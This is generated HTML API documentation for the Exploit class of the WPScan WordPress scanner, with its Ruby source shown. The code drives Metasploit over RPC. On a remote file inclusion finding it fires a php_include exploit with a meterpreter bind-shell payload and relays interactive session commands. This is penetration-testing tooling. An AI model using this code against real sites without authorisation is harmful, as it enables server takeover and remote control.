<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpscan/exploit_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/exploit.rb">lib/wpscan/exploit.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-choose_session">#choose_session</a></li>
<li><a href="#method-i-exploit">#exploit</a></li>
<li><a href="#method-i-exploit_info">#exploit_info</a></li>
<li><a href="#method-i-job_id">#job_id</a></li>
<li><a href="#method-i-kill_session">#kill_session</a></li>
<li><a href="#method-i-last_session_id">#last_session_id</a></li>
<li><a href="#method-i-meterpreter_read">#meterpreter_read</a></li>
<li><a href="#method-i-meterpreter_write">#meterpreter_write</a></li>
<li><a href="#method-i-read_shell">#read_shell</a></li>
<li><a href="#method-i-session_count">#session_count</a></li>
<li><a href="#method-i-sessions">#sessions</a></li>
<li><a href="#method-i-start">#start</a></li>
<li><a href="#method-i-write_shell">#write_shell</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Exploit</h1>
<div id="description" class="description">
<p>This library should contain all methods for exploitation.</p>
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Attributes -->
<div id="attribute-method-details" class="method-section section">
<h3 class="section-header">Attributes</h3>
<div id="postdata-attribute-method" class="method-detail">
<a name="postdata"></a>
<a name="postdata="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">postdata</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="rhost-attribute-method" class="method-detail">
<a name="rhost"></a>
<a name="rhost="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">rhost</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="type-attribute-method" class="method-detail">
<a name="type"></a>
<a name="type="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">type</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
<div id="uri-attribute-method" class="method-detail">
<a name="uri"></a>
<a name="uri="></a>
<div class="method-heading attribute-method-heading">
<span class="method-name">uri</span><span
class="attribute-access-type">[RW]</span>
</div>
<div class="method-description">
</div>
</div>
</div><!-- attribute-method-details -->
<!-- Methods -->
<div id="public-class-method-details" class="method-section section">
<h3 class="section-header">Public Class Methods</h3>
<div id="new-method" class="method-detail ">
<a name="method-c-new"></a>
<div class="method-heading">
<span class="method-name">new</span><span
class="method-args">(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="new-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 27</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">initialize</span>(<span class="ruby-identifier">wp_url</span>, <span class="ruby-identifier">type</span>, <span class="ruby-identifier">uri</span>, <span class="ruby-identifier">postdata</span>, <span class="ruby-identifier">use_proxy</span>, <span class="ruby-identifier">proxy_addr</span>, <span class="ruby-identifier">proxy_port</span>)
<span class="ruby-ivar">@wp_url</span> = <span class="ruby-constant">URI</span>.<span class="ruby-identifier">parse</span>(<span class="ruby-identifier">wp_url</span>.<span class="ruby-identifier">to_s</span>)
<span class="ruby-ivar">@rhost</span> = <span class="ruby-ivar">@wp_url</span>.<span class="ruby-identifier">host</span>
<span class="ruby-ivar">@path</span> = <span class="ruby-ivar">@wp_url</span>.<span class="ruby-identifier">path</span>
<span class="ruby-ivar">@type</span> = <span class="ruby-identifier">type</span>
<span class="ruby-ivar">@uri</span> = <span class="ruby-identifier">uri</span>
<span class="ruby-ivar">@postdata</span> = <span class="ruby-identifier">postdata</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-ivar">@use_proxy</span> = <span class="ruby-identifier">use_proxy</span>
<span class="ruby-ivar">@proxy_addr</span> = <span class="ruby-identifier">proxy_addr</span>
<span class="ruby-ivar">@proxy_port</span> = <span class="ruby-identifier">proxy_port</span>
<span class="ruby-identifier">start</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- new-source -->
</div>
</div><!-- new-method -->
</div><!-- public-class-method-details -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="choose_session-method" class="method-detail ">
<a name="method-i-choose_session"></a>
<div class="method-heading">
<span class="method-name">choose_session</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>if there is more than 1 session, allow the user to choose one.</p>
<div class="method-source-code" id="choose_session-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 148</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">choose_session</span>()
<span class="ruby-keyword">if</span> <span class="ruby-identifier">session_count</span>() <span class="ruby-operator">&gt;=</span> <span class="ruby-value">2</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[?] We have &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">session_count</span>().<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; sessions running. Please choose one by id.&quot;</span>
<span class="ruby-identifier">open_sessions</span> = <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">keys</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">open_session</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">open_sessions</span> <span class="ruby-operator">+=</span> <span class="ruby-identifier">open_session</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; &quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">open_sessions</span>
<span class="ruby-identifier">use_session</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Using session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">use_session</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-identifier">use_session</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Using session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">last_session_id</span>().<span class="ruby-identifier">to_s</span>
<span class="ruby-ivar">@session_in_use</span> = <span class="ruby-identifier">last_session_id</span>()
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- choose_session-source -->
</div>
</div><!-- choose_session-method -->
<div id="exploit-method" class="method-detail ">
<a name="method-i-exploit"></a>
<div class="method-heading">
<span class="method-name">exploit</span><span
class="method-args">(msf_module, payload)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>exploit</p>
<div class="method-source-code" id="exploit-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 61</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, <span class="ruby-identifier">payload</span>)
<span class="ruby-identifier">exploit_info</span>(<span class="ruby-identifier">msf_module</span>,<span class="ruby-identifier">payload</span>)
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">result</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, {<span class="ruby-value">:RHOST</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@rhost</span>,<span class="ruby-value">:PATH</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@path</span>,<span class="ruby-value">:PHPURI</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@uri</span>,<span class="ruby-value">:PAYLOAD</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">payload</span>})
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">result</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, {<span class="ruby-value">:RHOST</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@rhost</span>,<span class="ruby-value">:PATH</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@path</span>,<span class="ruby-value">:PHPURI</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@uri</span>,<span class="ruby-value">:POSTDATA</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-ivar">@postdata</span>, <span class="ruby-value">:PAYLOAD</span> =<span class="ruby-operator">&gt;</span> <span class="ruby-identifier">payload</span>})
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">result</span>[<span class="ruby-string">'result'</span>] <span class="ruby-operator">==</span> <span class="ruby-string">&quot;success&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[*] Exploit worked! Waiting for a session...&quot;</span>
<span class="ruby-identifier">session_spawn_timer</span> = <span class="ruby-constant">Time</span>.<span class="ruby-identifier">new</span>
<span class="ruby-keyword">while</span> <span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">nil?</span> <span class="ruby-keyword">or</span> <span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">empty?</span>
<span class="ruby-comment"># wait for a session to spawn with a timeout of 1 minute</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">Time</span>.<span class="ruby-identifier">now</span> <span class="ruby-operator">-</span> <span class="ruby-identifier">session_spawn_timer</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">60</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Session was not created... exiting.&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">choose_session</span>()
<span class="ruby-identifier">input</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">while</span> <span class="ruby-identifier">input</span>.<span class="ruby-identifier">nil?</span>
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">last_session_id</span>())
<span class="ruby-identifier">input</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">input</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;exit&quot;</span>
<span class="ruby-identifier">kill_session</span>(<span class="ruby-ivar">@session_in_use</span>)
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">last_session_id</span>(), <span class="ruby-identifier">input</span>)
<span class="ruby-identifier">input</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">else</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[ERROR] Exploit failed! :(&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- exploit-source -->
</div>
</div><!-- exploit-method -->
<div id="exploit_info-method" class="method-detail ">
<a name="method-i-exploit_info"></a>
<div class="method-heading">
<span class="method-name">exploit_info</span><span
class="method-args">(msf_module,payload)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>output our exploit data</p>
<div class="method-source-code" id="exploit_info-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 105</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">exploit_info</span>(<span class="ruby-identifier">msf_module</span>,<span class="ruby-identifier">payload</span>)
<span class="ruby-identifier">info</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">get_exploit_info</span>(<span class="ruby-identifier">msf_module</span>)
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| [EXPLOIT]&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Name: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">info</span>[<span class="ruby-string">'name'</span>]
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Description: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">info</span>[<span class="ruby-string">'description'</span>].<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\t&quot;</span>, <span class="ruby-string">&quot;&quot;</span>).<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\n\n&quot;</span>,<span class="ruby-string">&quot;\n&quot;</span>).<span class="ruby-identifier">gsub!</span>(<span class="ruby-string">&quot;\n&quot;</span>, <span class="ruby-string">&quot;\n| &quot;</span>).<span class="ruby-identifier">chop!</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| [OPTIONS]&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| RHOST: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@rhost</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| PATH: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@path</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| URI: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">uri</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| POSTDATA: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-keyword">if</span> <span class="ruby-ivar">@postdata</span> <span class="ruby-operator">!=</span> <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;| Payload: &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">payload</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- exploit_info-source -->
</div>
</div><!-- exploit_info-method -->
<div id="job_id-method" class="method-detail ">
<a name="method-i-job_id"></a>
<div class="method-heading">
<span class="method-name">job_id</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>not sure if this is needed?! not used.</p>
<div class="method-source-code" id="job_id-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 122</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">job_id</span>()
<span class="ruby-identifier">jobs</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">jobs</span>()
<span class="ruby-identifier">puts</span> <span class="ruby-identifier">jobs</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- job_id-source -->
</div>
</div><!-- job_id-method -->
<div id="kill_session-method" class="method-detail ">
<a name="method-i-kill_session"></a>
<div class="method-heading">
<span class="method-name">kill_session</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>kill a session by session id</p>
<div class="method-source-code" id="kill_session-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 167</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">kill_session</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-keyword">begin</span>
<span class="ruby-identifier">killed</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">kill_session</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">killed</span>[<span class="ruby-string">'result'</span>] <span class="ruby-operator">==</span> <span class="ruby-string">&quot;success&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[-] Session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">id</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; killed.&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">rescue</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[] Session &quot;</span> <span class="ruby-operator">+</span> <span class="ruby-identifier">id</span>.<span class="ruby-identifier">to_s</span> <span class="ruby-operator">+</span> <span class="ruby-string">&quot; does not exist.&quot;</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- kill_session-source -->
</div>
</div><!-- kill_session-method -->
<div id="last_session_id-method" class="method-detail ">
<a name="method-i-last_session_id"></a>
<div class="method-heading">
<span class="method-name">last_session_id</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>the last active session id created</p>
<div class="method-source-code" id="last_session_id-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 135</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">last_session_id</span>()
<span class="ruby-identifier">sessions</span>.<span class="ruby-identifier">keys</span>.<span class="ruby-identifier">last</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- last_session_id-source -->
</div>
</div><!-- last_session_id-method -->
<div id="meterpreter_read-method" class="method-detail ">
<a name="method-i-meterpreter_read"></a>
<div class="method-heading">
<span class="method-name">meterpreter_read</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>read data from a meterpreter session data must be base64 decoded.</p>
<div class="method-source-code" id="meterpreter_read-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 196</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-constant">Base64</span>.<span class="ruby-identifier">decode64</span>(<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">meterpreter_read</span>(<span class="ruby-identifier">id</span>)[<span class="ruby-string">'data'</span>])
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_read-source -->
</div>
</div><!-- meterpreter_read-method -->
<div id="meterpreter_write-method" class="method-detail ">
<a name="method-i-meterpreter_write"></a>
<div class="method-heading">
<span class="method-name">meterpreter_write</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>write data to a meterpreter session data must be base64 encoded.</p>
<div class="method-source-code" id="meterpreter_write-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 203</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">meterpreter_write</span>(<span class="ruby-identifier">id</span>, <span class="ruby-constant">Base64</span>.<span class="ruby-identifier">encode64</span>(<span class="ruby-identifier">data</span>))
<span class="ruby-keyword">end</span></pre>
</div><!-- meterpreter_write-source -->
</div>
</div><!-- meterpreter_write-method -->
<div id="read_shell-method" class="method-detail ">
<a name="method-i-read_shell"></a>
<div class="method-heading">
<span class="method-name">read_shell</span><span
class="method-args">(id)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>read data from a shell, meterpreter is not classed as a shell.</p>
<div class="method-source-code" id="read_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 182</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">read_shell</span>(<span class="ruby-identifier">id</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">read_shell</span>(<span class="ruby-identifier">id</span>)[<span class="ruby-string">'data'</span>]
<span class="ruby-keyword">end</span></pre>
</div><!-- read_shell-source -->
</div>
</div><!-- read_shell-method -->
<div id="session_count-method" class="method-detail ">
<a name="method-i-session_count"></a>
<div class="method-heading">
<span class="method-name">session_count</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>a count of the amount of active sessions</p>
<div class="method-source-code" id="session_count-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 141</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">session_count</span>()
<span class="ruby-identifier">sessions</span>().<span class="ruby-identifier">size</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- session_count-source -->
</div>
</div><!-- session_count-method -->
<div id="sessions-method" class="method-detail ">
<a name="method-i-sessions"></a>
<div class="method-heading">
<span class="method-name">sessions</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>all sessions and related session data</p>
<div class="method-source-code" id="sessions-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 129</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">sessions</span>()
<span class="ruby-identifier">sessions</span> = <span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">sessions</span>()
<span class="ruby-keyword">end</span></pre>
</div><!-- sessions-source -->
</div>
</div><!-- sessions-method -->
<div id="start-method" class="method-detail ">
<a name="method-i-start"></a>
<div class="method-heading">
<span class="method-name">start</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>figure out what to exploit</p>
<div class="method-source-code" id="start-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 43</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">start</span>()
<span class="ruby-keyword">if</span> <span class="ruby-ivar">@type</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;RFI&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[?] Exploit? [y/n]&quot;</span>
<span class="ruby-identifier">answer</span> = <span class="ruby-constant">Readline</span>.<span class="ruby-identifier">readline</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">answer</span> <span class="ruby-operator">=~</span> <span class="ruby-regexp">/^y/</span>
<span class="ruby-identifier">msf_module</span> = <span class="ruby-string">&quot;exploit/unix/webapp/php_include&quot;</span>
<span class="ruby-identifier">payload</span> = <span class="ruby-string">&quot;php/meterpreter/bind_tcp&quot;</span>
<span class="ruby-identifier">exploit</span>(<span class="ruby-identifier">msf_module</span>, <span class="ruby-identifier">payload</span>)
<span class="ruby-keyword">else</span>
<span class="ruby-keyword">return</span> <span class="ruby-keyword">false</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">elsif</span> <span class="ruby-ivar">@type</span> <span class="ruby-operator">==</span> <span class="ruby-string">&quot;SQLI&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- start-source -->
</div>
</div><!-- start-method -->
<div id="write_shell-method" class="method-detail ">
<a name="method-i-write_shell"></a>
<div class="method-heading">
<span class="method-name">write_shell</span><span
class="method-args">(id, data)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>write data to a shell, meterpreter is not classed as a shell.</p>
<div class="method-source-code" id="write_shell-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/exploit.rb, line 189</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">write_shell</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-constant">RpcClient</span>.<span class="ruby-identifier">new</span>.<span class="ruby-identifier">write_shell</span>(<span class="ruby-identifier">id</span>, <span class="ruby-identifier">data</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- write_shell-source -->
</div>
</div><!-- write_shell-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

489
doc/Generate_List.html Normal file
View File

@@ -0,0 +1,489 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Generate_List</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/wpstools/generate_list_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpstools/generate_list.rb">lib/wpstools/generate_list.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link"><a href="Object.html">Object</a></p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-c-new">::new</a></li>
<li><a href="#method-i-generate_full_list">#generate_full_list</a></li>
<li><a href="#method-i-generate_popular_list">#generate_popular_list</a></li>
<li><a href="#method-i-get_popular_items">#get_popular_items</a></li>
<li><a href="#method-i-save">#save</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
